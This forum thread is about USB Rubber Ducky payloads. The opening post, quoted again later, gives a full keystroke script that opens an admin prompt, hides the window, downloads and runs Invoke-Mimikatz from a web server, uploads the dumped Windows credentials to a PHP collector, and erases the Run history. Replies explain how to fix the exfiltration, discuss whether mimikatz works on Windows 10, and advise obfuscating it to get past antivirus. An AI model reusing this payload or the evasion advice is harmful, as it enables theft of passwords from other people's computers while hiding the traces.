Mr.X Posted December 10, 2016 Posted December 10, 2016 Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here? Quote
voidnecron_ Posted December 19, 2016 Posted December 19, 2016 Why would you netcat if you use the rx.php script? Just look into the web directory where rx.php is located and there should be all the files created by the script. Tip: Check the apache error log, in my case the use apache runs with (www-data) didn't have write permissions in this folder and thus the rx.php couldn't create files. Quote
rpc72 Posted January 15, 2017 Posted January 15, 2017 Starting Windows 8, passwords are no long stored in memory in the same way that can be reversed. Quote
L07TB0Y Posted February 24, 2017 Posted February 24, 2017 On 1/15/2017 at 1:30 PM, rpc72 said: Starting Windows 8, passwords are no long stored in memory in the same way that can be reversed. not ture mimikatz still works in win10 i just tested Quote
chaz Posted February 25, 2017 Posted February 25, 2017 17 hours ago, L07TB0Y said: not ture mimikatz still works in win10 i just tested Yeah but you only get plaintext passwords if you have set a specific registry key (on Windows 8+). Quote
hobbie123 Posted March 8, 2017 Posted March 8, 2017 Windows Password Manager is a free manager for XP and windows password issues and it works as good as can be expected. In addition,the main thing is to stop using the external hard disk until you use this tool, and avoid writing any files to it. Quote
ehsan123 Posted December 8, 2020 Posted December 8, 2020 On 12/10/2016 at 4:09 PM, Mr.X said: Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here? Does mimikatz work if there's an anti-virus installed on the computer or it still works? Quote
kuyaya Posted December 9, 2020 Posted December 9, 2020 On 12/8/2020 at 8:10 AM, ehsan123 said: Does mimikatz work if there's an anti-virus installed on the computer or it still works? Probably not by default. You'd have to obfuscate it first. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.